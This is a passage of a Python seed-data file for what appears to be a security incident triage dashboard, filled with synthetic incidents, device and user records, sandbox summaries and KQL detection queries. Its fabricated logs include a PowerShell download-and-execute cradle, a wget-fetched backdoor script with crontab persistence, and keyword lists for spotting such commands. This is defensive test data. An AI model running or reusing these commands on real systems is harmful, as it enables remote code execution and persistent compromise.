"""Synthetic seed data matching the frontend's expected structure."""

import json
from sqlmodel import Session, select
from database import engine, init_db
from datetime import datetime
from models import (
    Incident, FileIntelligence, DeviceContext, UserContext,
    CampaignContext, MalwareAnalysis, KQLQuery,
)


INCIDENTS = [
    Incident(
        id="1234-ABCD-5678-EFGH",
        title="Malicious Executable Detected on Finance Workstation",
        detection_timestamp="2026-02-11 14:32:18 UTC",
        severity="HIGH",
        device_name="FIN-WS-027",
        user="ola.nordmann@company.com",
        file_name="supersusmalware.exe",
        file_hash="fb55414848281f804858ce188c3dc659d129e283bd62d58d34f6e6f568feab37",
        microsoft_signature="Trojan:Win32/Loader.ABCIml",
        mitre_attack="T1059 - Command and Scripting Interpreter",
        quarantine_status="Successful",
        log_source="Microsoft Defender for Endpoint",
        source_ip="10.14.2.27",
        destination_ip="185.220.101.34",
        status="Open",
        logs_json=json.dumps([
            "Feb 11 14:31:02 FIN-WS-027 defender[1201]: File supersusmalware.exe written to C:\\Users\\ola\\Downloads\\",
            "Feb 11 14:31:04 FIN-WS-027 defender[1201]: Hash match: 9f2c6a9d...5a4 flagged Trojan:Win32/Loader.ABCIml",
            "Feb 11 14:31:05 FIN-WS-027 defender[1201]: Process supersusmalware.exe (PID 8832) attempted execution",
            "Feb 11 14:31:05 FIN-WS-027 defender[1201]: Outbound connection 10.14.2.27 -> 185.220.101.34:443 blocked",
            "Feb 11 14:31:06 FIN-WS-027 defender[1201]: File quarantined successfully",
            "Feb 11 14:32:18 FIN-WS-027 defender[1201]: Alert generated - severity HIGH",
        ]),
    ),
    Incident(
        id="5678-WXYZ-9012-MNOP",
        title="Brute-Force SSH Login Detected",
        detection_timestamp="2026-02-12 03:24:11 UTC",
        severity="HIGH",
        device_name="PROD-DB-01",
        user="root",
        file_name="",
        file_hash="",
        microsoft_signature="",
        mitre_attack="T1110 - Brute Force",
        quarantine_status="N/A",
        log_source="Syslog / SSH",
        source_ip="203.0.113.42",
        destination_ip="10.0.1.50",
        status="Open",
        logs_json=json.dumps([
            "Feb 12 03:22:01 prod-db-01 sshd[4012]: Failed password for root from 203.0.113.42 port 44210 ssh2",
            "Feb 12 03:22:03 prod-db-01 sshd[4012]: Failed password for root from 203.0.113.42 port 44211 ssh2",
            "Feb 12 03:22:06 prod-db-01 sshd[4012]: Failed password for admin from 203.0.113.42 port 44212 ssh2",
            "Feb 12 03:22:09 prod-db-01 sshd[4012]: Failed password for root from 203.0.113.42 port 44213 ssh2",
            "Feb 12 03:22:14 prod-db-01 sshd[4012]: Failed password for root from 203.0.113.42 port 44214 ssh2",
            "Feb 12 03:23:55 prod-db-01 sshd[4012]: Accepted password for root from 203.0.113.42 port 44220 ssh2",
            "Feb 12 03:24:11 prod-db-01 sshd[4012]: pam_unix(sshd:session): session opened for user root",
        ]),
    ),
    Incident(
        id="9012-QRST-3456-UVWX",
        title="Suspicious PowerShell Download Cradle",
        detection_timestamp="2026-02-13 09:15:42 UTC",
        severity="CRITICAL",
        device_name="HR-LAPTOP-011",
        user="kari.hansen@company.com",
        file_name="update_check.ps1",
        file_hash="a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2",
        microsoft_signature="Behavior:Win32/SuspPowerShell.B",
        mitre_attack="T1059.001 - PowerShell",
        quarantine_status="Failed - Process Running",
        log_source="Microsoft Defender for Endpoint",
        source_ip="10.14.3.11",
        destination_ip="91.215.85.142",
        status="Open",
        logs_json=json.dumps([
            "Feb 13 09:14:30 HR-LAPTOP-011 outlook[3201]: Attachment saved: update_check.ps1",
            "Feb 13 09:15:01 HR-LAPTOP-011 powershell[5504]: Script execution: update_check.ps1",
            "Feb 13 09:15:02 HR-LAPTOP-011 powershell[5504]: IEX (New-Object Net.WebClient).DownloadString('http://91.215.85.142/payload')",
            "Feb 13 09:15:03 HR-LAPTOP-011 defender[1201]: Behavior:Win32/SuspPowerShell.B detected",
            "Feb 13 09:15:05 HR-LAPTOP-011 powershell[5504]: Connection established to 91.215.85.142:80",
            "Feb 13 09:15:10 HR-LAPTOP-011 defender[1201]: Quarantine FAILED - process 5504 still running",
            "Feb 13 09:15:42 HR-LAPTOP-011 defender[1201]: Alert generated - severity CRITICAL",
        ]),
    ),
    Incident(
        id="3456-JKLM-7890-NOPQ",
        title="Lateral Movement via PsExec",
        detection_timestamp="2026-02-13 16:48:33 UTC",
        severity="CRITICAL",
        device_name="IT-ADMIN-004",
        user="admin.svc@company.com",
        file_name="psexec.exe",
        file_hash="b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5",
        microsoft_signature="HackTool:Win32/PsExec",
        mitre_attack="T1570 - Lateral Tool Transfer",
        quarantine_status="Pending",
        log_source="Microsoft Defender for Endpoint",
        source_ip="10.14.1.4",
        destination_ip="10.14.2.27",
        status="Investigating",
        logs_json=json.dumps([
            "Feb 13 16:45:01 IT-ADMIN-004 psexec[7201]: Remote execution initiated to FIN-WS-027 (10.14.2.27)",
            "Feb 13 16:45:02 IT-ADMIN-004 psexec[7201]: Service PSEXESVC installed on FIN-WS-027",
            "Feb 13 16:45:03 IT-ADMIN-004 psexec[7201]: Process cmd.exe started on FIN-WS-027 as SYSTEM",
            "Feb 13 16:46:15 IT-ADMIN-004 defender[1201]: HackTool:Win32/PsExec detected",
            "Feb 13 16:47:00 IT-ADMIN-004 psexec[7201]: Remote execution to HR-LAPTOP-011 (10.14.3.11)",
            "Feb 13 16:48:33 IT-ADMIN-004 defender[1201]: Alert generated - severity CRITICAL",
        ]),
    ),
    Incident(
        id="7890-DEFG-1234-HIJK",
        title="Data Exfiltration to Cloud Storage",
        detection_timestamp="2026-02-14 11:22:07 UTC",
        severity="MEDIUM",
        device_name="FIN-WS-023",
        user="per.berg@company.com",
        file_name="",
        file_hash="",
        microsoft_signature="",
        mitre_attack="T1567 - Exfiltration Over Web Service",
        quarantine_status="N/A",
        log_source="Network DLP / Proxy",
        source_ip="10.14.2.23",
        destination_ip="142.250.74.46",
        status="Open",
        logs_json=json.dumps([
            "Feb 14 11:15:00 FIN-WS-023 proxy[801]: HTTPS POST to drive.google.com/upload (4.2 GB)",
            "Feb 14 11:15:01 FIN-WS-023 dlp[1501]: Sensitive file pattern matched: *Q4_financials*",
            "Feb 14 11:18:00 FIN-WS-023 proxy[801]: HTTPS POST to drive.google.com/upload (2.1 GB)",
            "Feb 14 11:18:01 FIN-WS-023 dlp[1501]: Sensitive file pattern matched: *employee_salaries*",
            "Feb 14 11:20:00 FIN-WS-023 proxy[801]: Upload volume threshold exceeded (6.3 GB in 5 min)",
            "Feb 14 11:22:07 FIN-WS-023 dlp[1501]: Alert generated - severity MEDIUM",
        ]),
    ),
]


FILE_INTELLIGENCE = [
    FileIntelligence(
        file_hash="a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2",
        vt_detection_ratio="38/71 vendors",
        vt_first_submission="2026-02-12 22:01 UTC",
        vt_last_analysis="2026-02-13 09:10 UTC",
        vt_file_type="ASCII text (PowerShell script)",
        vt_popular_threat_labels_json=json.dumps(["powershell.downloader", "trojan.agent", "script.suspicious"]),
        vt_reputation_score="Malicious",
        ms_classification="Malicious",
        ms_threat_family="Behavior:Win32/SuspPowerShell.B",
        ms_prevalence="Medium",
        ms_global_detection_level="Stable",
        ms_cloud_protection_level="High confidence",
        seen_before="No",
        first_seen_internally="2026-02-13 09:15 UTC",
        last_seen_internally="2026-02-13 09:15 UTC",
        number_of_affected_devices="1",
        affected_devices_json=json.dumps(["HR-LAPTOP-011"]),
        total_internal_detections="1",
        seen_across_customers="Yes",
        number_of_customer_environments="12",
        first_observed_across_customers="2026-02-12",
        spike_detected_last_24h="Yes",
        campaign_likelihood="High",
        df_classification="Malicious",
        df_threat_family="Behavior:Win32/SuspPowerShell.B",
        df_prevalence="Medium",
        df_global_detection_level="Stable",
        df_cloud_protection_level="High confidence",
    ),
    FileIntelligence(
        file_hash="b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5",
        vt_detection_ratio="15/71 vendors",
        vt_first_submission="2019-03-14 10:00 UTC",
        vt_last_analysis="2026-02-13 16:40 UTC",
        vt_file_type="PE32 executable (Windows)",
        vt_popular_threat_labels_json=json.dumps(["hacktool.psexec", "riskware", "not-a-virus"]),
        vt_reputation_score="Suspicious (dual-use tool)",
        ms_classification="HackTool",
        ms_threat_family="HackTool:Win32/PsExec",
        ms_prevalence="High",
        ms_global_detection_level="Stable",
        ms_cloud_protection_level="Low",
        seen_before="Yes",
        first_seen_internally="2025-06-01 08:00 UTC",
        last_seen_internally="2026-02-13 16:45 UTC",
        number_of_affected_devices="2",
        affected_devices_json=json.dumps(["IT-ADMIN-004", "IT-ADMIN-002"]),
        total_internal_detections="23",
        seen_across_customers="Yes",
        number_of_customer_environments="48",
        first_observed_across_customers="2019-03-14",
        spike_detected_last_24h="No",
        campaign_likelihood="Low",
        df_classification="HackTool",
        df_threat_family="HackTool:Win32/PsExec",
        df_prevalence="High",
        df_global_detection_level="Stable",
        df_cloud_protection_level="Low",
    ),
]


DEVICE_CONTEXTS = [
    DeviceContext(
        device_id="DEV-FIN-027",
        device_name="FIN-WS-027",
        tenant_id="tenant-001",
        os_platform="Windows",
        os_version="Windows 11 23H2",
        device_type="Workstation",
        risk_level="High",
        exposure_level="Medium",
        last_logged_on_user="ola.nordmann@company.com",
        failed_logons_last_24h=2,
        suspicious_processes_last_24h=3,
        beaconing_detected=True,
        credential_dumping_detected=False,
        mitre_techniques_json=json.dumps(["T1059", "T1071.001"]),
        last_seen=datetime(2026, 2, 11, 14, 32, 18),
    ),
    DeviceContext(
        device_id="DEV-PROD-DB-01",
        device_name="PROD-DB-01",
        tenant_id="tenant-001",
        os_platform="Linux",
        os_version="Ubuntu 22.04 LTS",
        device_type="Server",
        risk_level="Critical",
        exposure_level="High",
        last_logged_on_user="root",
        failed_logons_last_24h=147,
        suspicious_processes_last_24h=0,
        beaconing_detected=False,
        credential_dumping_detected=False,
        mitre_techniques_json=json.dumps(["T1110"]),
        last_seen=datetime(2026, 2, 12, 3, 24, 11),
    ),
    DeviceContext(
        device_id="DEV-HR-011",
        device_name="HR-LAPTOP-011",
        tenant_id="tenant-001",
        os_platform="Windows",
        os_version="Windows 11 23H2",
        device_type="Laptop",
        risk_level="Critical",
        exposure_level="High",
        last_logged_on_user="kari.hansen@company.com",
        failed_logons_last_24h=0,
        suspicious_processes_last_24h=5,
        beaconing_detected=True,
        credential_dumping_detected=True,
        mitre_techniques_json=json.dumps(["T1059.001", "T1105", "T1071.001"]),
        last_seen=datetime(2026, 2, 13, 9, 15, 42),
    ),
    DeviceContext(
        device_id="DEV-IT-004",
        device_name="IT-ADMIN-004",
        tenant_id="tenant-001",
        os_platform="Windows",
        os_version="Windows 11 23H2",
        device_type="Workstation",
        risk_level="High",
        exposure_level="Medium",
        last_logged_on_user="admin.svc@company.com",
        failed_logons_last_24h=0,
        suspicious_processes_last_24h=2,
        beaconing_detected=False,
        credential_dumping_detected=False,
        mitre_techniques_json=json.dumps(["T1570", "T1021.002"]),
        last_seen=datetime(2026, 2, 13, 16, 48, 33),
    ),
    DeviceContext(
        device_id="DEV-FIN-023",
        device_name="FIN-WS-023",
        tenant_id="tenant-001",
        os_platform="Windows",
        os_version="Windows 11 23H2",
        device_type="Workstation",
        risk_level="Medium",
        exposure_level="Low",
        last_logged_on_user="per.berg@company.com",
        failed_logons_last_24h=0,
        suspicious_processes_last_24h=0,
        beaconing_detected=False,
        credential_dumping_detected=False,
        mitre_techniques_json=json.dumps(["T1567"]),
        last_seen=datetime(2026, 2, 14, 11, 22, 7),
    ),
]

USER_CONTEXTS = [
    UserContext(
        user_id="USR-001",
        user_principal_name="ola.nordmann@company.com",
        display_name="Ola Nordmann",
        tenant_id="tenant-001",
        account_enabled=True,
        risk_level="High",
        sign_in_risk_level="Medium",
        failed_logins_last_24h=2,
        impossible_travel_detected=False,
        mfa_enabled=True,
        privileged_roles_json=json.dumps(["Finance Analyst"]),
        mitre_techniques_json=json.dumps(["T1059"]),
        last_sign_in=datetime(2026, 2, 11, 14, 30, 0),
    ),
    UserContext(
        user_id="USR-002",
        user_principal_name="root",
        display_name="root (PROD-DB-01)",
        tenant_id="tenant-001",
        account_enabled=True,
        risk_level="Critical",
        sign_in_risk_level="High",
        failed_logins_last_24h=147,
        impossible_travel_detected=True,
        mfa_enabled=False,
        privileged_roles_json=json.dumps(["root", "Database Administrator"]),
        mitre_techniques_json=json.dumps(["T1110"]),
        last_sign_in=datetime(2026, 2, 12, 3, 23, 55),
    ),
    UserContext(
        user_id="USR-003",
        user_principal_name="kari.hansen@company.com",
        display_name="Kari Hansen",
        tenant_id="tenant-001",
        account_enabled=True,
        risk_level="High",
        sign_in_risk_level="Medium",
        failed_logins_last_24h=0,
        impossible_travel_detected=False,
        mfa_enabled=True,
        privileged_roles_json=json.dumps(["HR Manager"]),
        mitre_techniques_json=json.dumps(["T1059.001", "T1204.002"]),
        last_sign_in=datetime(2026, 2, 13, 8, 45, 0),
    ),
    UserContext(
        user_id="USR-004",
        user_principal_name="admin.svc@company.com",
        display_name="Admin Service Account",
        tenant_id="tenant-001",
        account_enabled=True,
        risk_level="Critical",
        sign_in_risk_level="High",
        failed_logins_last_24h=0,
        impossible_travel_detected=False,
        mfa_enabled=False,
        privileged_roles_json=json.dumps(["Domain Admin", "Global Admin"]),
        mitre_techniques_json=json.dumps(["T1570", "T1021.002"]),
        last_sign_in=datetime(2026, 2, 13, 16, 44, 0),
    ),
    UserContext(
        user_id="USR-005",
        user_principal_name="per.berg@company.com",
        display_name="Per Berg",
        tenant_id="tenant-001",
        account_enabled=True,
        risk_level="Medium",
        sign_in_risk_level="Low",
        failed_logins_last_24h=0,
        impossible_travel_detected=False,
        mfa_enabled=True,
        privileged_roles_json=json.dumps(["Finance Analyst"]),
        mitre_techniques_json=json.dumps(["T1567"]),
        last_sign_in=datetime(2026, 2, 14, 8, 30, 0),
    ),
]

CAMPAIGN_CONTEXTS = [
    CampaignContext(
        campaign_id="CAMP-001",
        campaign_likelihood="Medium\u2013High",
        spike_detected_last_24h=True,
        number_of_affected_devices=5,
        number_of_affected_users=4,
        number_of_customer_environments=4,
        first_observed=datetime(2026, 2, 9, 8, 0, 0),
        last_observed=datetime(2026, 2, 14, 11, 22, 0),
        related_hashes_json=json.dumps([
            "9f2c6a9d4c1e5b3a8f7e2d9c6a4b3e1f0c8d7a6b5e4c3f2d1a0b9c8d7e6f5a4",
            "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2",
        ]),
        related_ips_json=json.dumps(["185.220.101.34", "91.215.85.142"]),
        related_techniques_json=json.dumps(["T1059", "T1059.001", "T1570", "T1567"]),
    ),
]

MALWARE_ANALYSES = [
    MalwareAnalysis(
        file_hash="9f2c6a9d4c1e5b3a8f7e2d9c6a4b3e1f0c8d7a6b5e4c3f2d1a0b9c8d7e6f5a4",
        sandbox_score="92/100",
        behavior_summary="Drops secondary payload, establishes C2 via HTTPS to 185.220.101.34, attempts credential harvesting.",
        processes_spawned_json=json.dumps(["cmd.exe", "powershell.exe", "rundll32.exe"]),
        registry_changes_json=json.dumps([
            "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\UpdateSvc",
            "HKLM\\SYSTEM\\CurrentControlSet\\Services\\MalSvc",
        ]),
        network_connections_json=json.dumps(["185.220.101.34:443", "185.220.101.34:8080"]),
        persistence_detected=True,
        credential_access_detected=True,
        command_and_control_detected=True,
        mitre_techniques_json=json.dumps(["T1059", "T1547.001", "T1003", "T1071.001"]),
        analysis_timestamp=datetime(2026, 2, 11, 15, 0, 0),
    ),
    MalwareAnalysis(
        file_hash="a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2",
        sandbox_score="88/100",
        behavior_summary="PowerShell download cradle fetches secondary payload from 91.215.85.142, executes in memory.",
        processes_spawned_json=json.dumps(["powershell.exe", "conhost.exe"]),
        registry_changes_json=json.dumps([
            "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\PsUpdate",
        ]),
        network_connections_json=json.dumps(["91.215.85.142:80", "91.215.85.142:443"]),
        persistence_detected=True,
        credential_access_detected=False,
        command_and_control_detected=True,
        mitre_techniques_json=json.dumps(["T1059.001", "T1105", "T1547.001", "T1071.001"]),
        analysis_timestamp=datetime(2026, 2, 13, 10, 0, 0),
    ),
    MalwareAnalysis(
        file_hash="b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5",
        sandbox_score="35/100",
        behavior_summary="Legitimate Sysinternals PsExec tool used for remote administration. Dual-use risk.",
        processes_spawned_json=json.dumps(["psexesvc.exe", "cmd.exe"]),
        registry_changes_json=json.dumps([
            "HKLM\\SYSTEM\\CurrentControlSet\\Services\\PSEXESVC",
        ]),
        network_connections_json=json.dumps(["10.14.2.27:445", "10.14.3.11:445"]),
        persistence_detected=False,
        credential_access_detected=False,
        command_and_control_detected=False,
        mitre_techniques_json=json.dumps(["T1570", "T1021.002"]),
        analysis_timestamp=datetime(2026, 2, 13, 17, 0, 0),
    ),
]

KQL_QUERIES = [
    # ---- FIN-WS-027 (Malicious Executable) ----
    KQLQuery(
        query_name="Outbound C2 connections",
        query_description="Detect outbound connections to known C2 IP from the affected device.",
        kql_statement="DeviceNetworkEvents\n| where DeviceName == 'FIN-WS-027'\n| where RemoteIP == '185.220.101.34'\n| project Timestamp, RemoteIP, RemotePort, InitiatingProcessFileName",
        related_entity_type="device",
        related_entity_id="FIN-WS-027",
        execution_timestamp=datetime(2026, 2, 11, 15, 0, 0),
        result_count=4,
        mitre_techniques_json=json.dumps(["T1071.001"]),
        result_columns_json=json.dumps(["Timestamp", "RemoteIP", "RemotePort", "InitiatingProcessFileName"]),
        result_rows_json=json.dumps([
            ["2026-02-11 14:31:05", "185.220.101.34", "443", "supersusmalware.exe"],
            ["2026-02-11 14:31:08", "185.220.101.34", "443", "supersusmalware.exe"],
            ["2026-02-11 14:31:12", "185.220.101.34", "8080", "rundll32.exe"],
            ["2026-02-11 14:31:30", "185.220.101.34", "443", "powershell.exe"],
        ]),
    ),
    KQLQuery(
        query_name="File write events",
        query_description="Find all file creation events in the Downloads folder around the time of detection.",
        kql_statement="DeviceFileEvents\n| where DeviceName == 'FIN-WS-027'\n| where FolderPath has 'Downloads'\n| where Timestamp between (datetime(2026-02-11 14:00) .. datetime(2026-02-11 15:00))\n| project Timestamp, FileName, FolderPath, SHA256, InitiatingProcessFileName",
        related_entity_type="device",
        related_entity_id="FIN-WS-027",
        execution_timestamp=datetime(2026, 2, 11, 15, 10, 0),
        result_count=2,
        mitre_techniques_json=json.dumps(["T1105"]),
        result_columns_json=json.dumps(["Timestamp", "FileName", "FolderPath", "SHA256", "InitiatingProcessFileName"]),
        result_rows_json=json.dumps([
            ["2026-02-11 14:31:02", "supersusmalware.exe", "C:\\Users\\ola\\Downloads\\", "fb554148...feab37", "chrome.exe"],
            ["2026-02-11 14:31:04", "config.dat", "C:\\Users\\ola\\Downloads\\", "a3e8f201...9bc412", "supersusmalware.exe"],
        ]),
    ),
    KQLQuery(
        query_name="Process execution timeline",
        query_description="List all processes spawned on the device in the hour surrounding the incident.",
        kql_statement="DeviceProcessEvents\n| where DeviceName == 'FIN-WS-027'\n| where Timestamp between (datetime(2026-02-11 14:00) .. datetime(2026-02-11 15:00))\n| project Timestamp, FileName, ProcessCommandLine, AccountName, InitiatingProcessFileName\n| sort by Timestamp asc",
        related_entity_type="device",
        related_entity_id="FIN-WS-027",
        execution_timestamp=datetime(2026, 2, 11, 15, 15, 0),
        result_count=5,
        mitre_techniques_json=json.dumps(["T1059"]),
        result_columns_json=json.dumps(["Timestamp", "FileName", "ProcessCommandLine", "AccountName"]),
        result_rows_json=json.dumps([
            ["2026-02-11 14:31:02", "chrome.exe", "chrome.exe --download", "ola.nordmann"],
            ["2026-02-11 14:31:05", "supersusmalware.exe", "supersusmalware.exe", "ola.nordmann"],
            ["2026-02-11 14:31:06", "cmd.exe", "cmd.exe /c whoami", "ola.nordmann"],
            ["2026-02-11 14:31:08", "powershell.exe", "powershell -enc SQBFAFgA...", "ola.nordmann"],
            ["2026-02-11 14:31:12", "rundll32.exe", "rundll32.exe config.dat,Start", "ola.nordmann"],
        ]),
    ),

    # ---- PROD-DB-01 (Brute-Force SSH) ----
    KQLQuery(
        query_name="Failed SSH logins",
        query_description="Count failed SSH authentication attempts from external sources.",
        kql_statement="Syslog\n| where Computer == 'PROD-DB-01'\n| where SyslogMessage contains 'Failed password'\n| summarize count() by SourceIP, bin(TimeGenerated, 1m)",
        related_entity_type="device",
        related_entity_id="PROD-DB-01",
        execution_timestamp=datetime(2026, 2, 12, 4, 0, 0),
        result_count=5,
        mitre_techniques_json=json.dumps(["T1110"]),
        result_columns_json=json.dumps(["SourceIP", "TimeGenerated", "count_"]),
        result_rows_json=json.dumps([
            ["203.0.113.42", "2026-02-12 03:22:00", "34"],
            ["203.0.113.42", "2026-02-12 03:23:00", "52"],
            ["203.0.113.42", "2026-02-12 03:24:00", "41"],
            ["198.51.100.7", "2026-02-12 03:22:00", "12"],
            ["198.51.100.7", "2026-02-12 03:23:00", "8"],
        ]),
    ),
    KQLQuery(
        query_name="Successful logins after brute-force",
        query_description="Identify successful SSH logins following a burst of failed attempts from the same IP.",
        kql_statement="Syslog\n| where Computer == 'PROD-DB-01'\n| where SyslogMessage contains 'Accepted password'\n| where SourceIP == '203.0.113.42'\n| project TimeGenerated, SourceIP, SyslogMessage",
        related_entity_type="device",
        related_entity_id="PROD-DB-01",
        execution_timestamp=datetime(2026, 2, 12, 4, 5, 0),
        result_count=1,
        mitre_techniques_json=json.dumps(["T1110", "T1078"]),
        result_columns_json=json.dumps(["TimeGenerated", "SourceIP", "SyslogMessage"]),
        result_rows_json=json.dumps([
            ["2026-02-12 03:23:55", "203.0.113.42", "Accepted password for root from 203.0.113.42 port 44220 ssh2"],
        ]),
    ),
    KQLQuery(
        query_name="Post-compromise activity",
        query_description="Check for commands executed by the root user after the successful brute-force login.",
        kql_statement="Syslog\n| where Computer == 'PROD-DB-01'\n| where TimeGenerated > datetime(2026-02-12 03:24:00)\n| where SyslogMessage has_any ('sudo', 'wget', 'curl', 'chmod', 'useradd', 'crontab')\n| project TimeGenerated, SyslogMessage",
        related_entity_type="device",
        related_entity_id="PROD-DB-01",
        execution_timestamp=datetime(2026, 2, 12, 4, 10, 0),
        result_count=3,
        mitre_techniques_json=json.dumps(["T1059.004", "T1053.003"]),
        result_columns_json=json.dumps(["TimeGenerated", "SyslogMessage"]),
        result_rows_json=json.dumps([
            ["2026-02-12 03:25:01", "wget http://203.0.113.42/backdoor.sh -O /tmp/.bd.sh"],
            ["2026-02-12 03:25:04", "chmod +x /tmp/.bd.sh"],
            ["2026-02-12 03:25:10", "crontab -l | echo '*/5 * * * * /tmp/.bd.sh' | crontab -"],
        ]),
    ),

    # ---- HR-LAPTOP-011 (PowerShell Download Cradle) ----
    KQLQuery(
        query_name="PowerShell download cradle activity",
        query_description="Identify PowerShell processes using DownloadString or IEX patterns.",
        kql_statement="DeviceProcessEvents\n| where FileName == 'powershell.exe'\n| where ProcessCommandLine has_any ('DownloadString', 'IEX', 'Invoke-Expression')\n| project Timestamp, DeviceName, AccountName, ProcessCommandLine",
        related_entity_type="device",
        related_entity_id="HR-LAPTOP-011",
        execution_timestamp=datetime(2026, 2, 13, 10, 30, 0),
        result_count=2,
        mitre_techniques_json=json.dumps(["T1059.001"]),
        result_columns_json=json.dumps(["Timestamp", "DeviceName", "AccountName", "ProcessCommandLine"]),
        result_rows_json=json.dumps([
            ["2026-02-13 09:15:02", "HR-LAPTOP-011", "kari.hansen", "IEX (New-Object Net.WebClient).DownloadString('http://91.215.85.142/payload')"],
            ["2026-02-13 09:15:18", "HR-LAPTOP-011", "kari.hansen", "powershell -enc JABjAD0ATgBlAHcALQBPAGIA..."],
        ]),
    ),
    KQLQuery(
        query_name="Network connections from PowerShell",
        query_description="Find all outbound network connections initiated by PowerShell on the device.",
        kql_statement="DeviceNetworkEvents\n| where DeviceName == 'HR-LAPTOP-011'\n| where InitiatingProcessFileName == 'powershell.exe'\n| project Timestamp, RemoteIP, RemotePort, RemoteUrl",
        related_entity_type="device",
        related_entity_id="HR-LAPTOP-011",
        execution_timestamp=datetime(2026, 2, 13, 10, 35, 0),
        result_count=5,
        mitre_techniques_json=json.dumps(["T1071.001", "T1105"]),
        result_columns_json=json.dumps(["Timestamp", "RemoteIP", "RemotePort", "RemoteUrl"]),
        result_rows_json=json.dumps([
            ["2026-02-13 09:15:03", "91.215.85.142", "80", "http://91.215.85.142/payload"],
            ["2026-02-13 09:15:05", "91.215.85.142", "80", "http://91.215.85.142/config"],
            ["2026-02-13 09:15:20", "91.215.85.142", "443", "https://91.215.85.142/c2"],
            ["2026-02-13 09:16:01", "91.215.85.142", "443", "https://91.215.85.142/exfil"],
            ["2026-02-13 09:17:30", "91.215.85.142", "443", "https://91.215.85.142/c2"],
        ]),
    ),
    KQLQuery(
        query_name="Email attachment origin",
        query_description="Trace the email attachment that delivered the malicious script to the user.",
        kql_statement="EmailAttachmentInfo\n| where RecipientEmailAddress == 'kari.hansen@company.com'\n| where FileName == 'update_check.ps1'\n| project Timestamp, SenderFromAddress, Subject, FileName, SHA256",
        related_entity_type="device",
        related_entity_id="HR-LAPTOP-011",
        execution_timestamp=datetime(2026, 2, 13, 10, 40, 0),
        result_count=1,
        mitre_techniques_json=json.dumps(["T1566.001"]),
        result_columns_json=json.dumps(["Timestamp", "SenderFromAddress", "Subject", "FileName", "SHA256"]),
        result_rows_json=json.dumps([
            ["2026-02-13 09:12:44", "it-support@c0mpany-updates.com", "Urgent: System Update Required", "update_check.ps1", "a1b2c3d4...f0a1b2"],
        ]),
    ),

    # ---- IT-ADMIN-004 (Lateral Movement via PsExec) ----
    KQLQuery(
        query_name="PsExec lateral movement",
        query_description="Track PsExec service installation events across the network.",
        kql_statement="DeviceProcessEvents\n| where FileName == 'psexesvc.exe' or InitiatingProcessFileName == 'psexec.exe'\n| project Timestamp, DeviceName, AccountName, FileName, RemoteDeviceName",
        related_entity_type="device",
        related_entity_id="IT-ADMIN-004",
        execution_timestamp=datetime(2026, 2, 13, 17, 0, 0),
        result_count=4,
        mitre_techniques_json=json.dumps(["T1570", "T1021.002"]),
        result_columns_json=json.dumps(["Timestamp", "DeviceName", "AccountName", "FileName", "RemoteDeviceName"]),
        result_rows_json=json.dumps([
            ["2026-02-13 16:45:01", "IT-ADMIN-004", "admin.svc", "psexec.exe", "FIN-WS-027"],
            ["2026-02-13 16:45:02", "FIN-WS-027", "SYSTEM", "psexesvc.exe", ""],
            ["2026-02-13 16:47:00", "IT-ADMIN-004", "admin.svc", "psexec.exe", "HR-LAPTOP-011"],
            ["2026-02-13 16:47:01", "HR-LAPTOP-011", "SYSTEM", "psexesvc.exe", ""],
        ]),
    ),
    KQLQuery(
        query_name="SMB connections from admin workstation",
        query_description="List all SMB (port 445) connections originating from the admin workstation.",
        kql_statement="DeviceNetworkEvents\n| where DeviceName == 'IT-ADMIN-004'\n| where RemotePort == 445\n| project Timestamp, RemoteIP, RemoteDeviceName, InitiatingProcessFileName, AccountName",
        related_entity_type="device",
        related_entity_id="IT-ADMIN-004",
        execution_timestamp=datetime(2026, 2, 13, 17, 5, 0),
        result_count=4,
        mitre_techniques_json=json.dumps(["T1021.002"]),
        result_columns_json=json.dumps(["Timestamp", "RemoteIP", "RemoteDeviceName", "InitiatingProcessFileName", "AccountName"]),
        result_rows_json=json.dumps([
            ["2026-02-13 16:44:58", "10.14.2.27", "FIN-WS-027", "psexec.exe", "admin.svc"],
            ["2026-02-13 16:45:02", "10.14.2.27", "FIN-WS-027", "psexec.exe", "admin.svc"],
            ["2026-02-13 16:46:55", "10.14.3.11", "HR-LAPTOP-011", "psexec.exe", "admin.svc"],
            ["2026-02-13 16:47:01", "10.14.3.11", "HR-LAPTOP-011", "psexec.exe", "admin.svc"],
        ]),
    ),
    KQLQuery(
        query_name="Service account logon activity",
        query_description="Review all logon events for the admin service account across the environment.",
        kql_statement="IdentityLogonEvents\n| where AccountUpn == 'admin.svc@company.com'\n| summarize count() by DeviceName, LogonType, bin(Timestamp, 1h)\n| sort by Timestamp desc",
        related_entity_type="device",
        related_entity_id="IT-ADMIN-004",
        execution_timestamp=datetime(2026, 2, 13, 17, 10, 0),
        result_count=4,
        mitre_techniques_json=json.dumps(["T1078.002"]),
        result_columns_json=json.dumps(["DeviceName", "LogonType", "Timestamp", "count_"]),
        result_rows_json=json.dumps([
            ["IT-ADMIN-004", "Interactive", "2026-02-13 16:00", "3"],
            ["FIN-WS-027", "RemoteInteractive", "2026-02-13 16:00", "4"],
            ["HR-LAPTOP-011", "RemoteInteractive", "2026-02-13 16:00", "2"],
            ["IT-ADMIN-004", "Network", "2026-02-13 15:00", "19"],
        ]),
    ),

    # ---- FIN-WS-023 (Data Exfiltration) ----
    KQLQuery(
        query_name="Large uploads to cloud storage",
        query_description="Detect unusually large uploads to external cloud storage services.",
        kql_statement="DeviceNetworkEvents\n| where RemoteUrl has_any ('drive.google.com', 'dropbox.com', 'onedrive.live.com')\n| where SentBytes > 1000000000\n| project Timestamp, DeviceName, AccountName, RemoteUrl, SentBytes",
        related_entity_type="device",
        related_entity_id="FIN-WS-023",
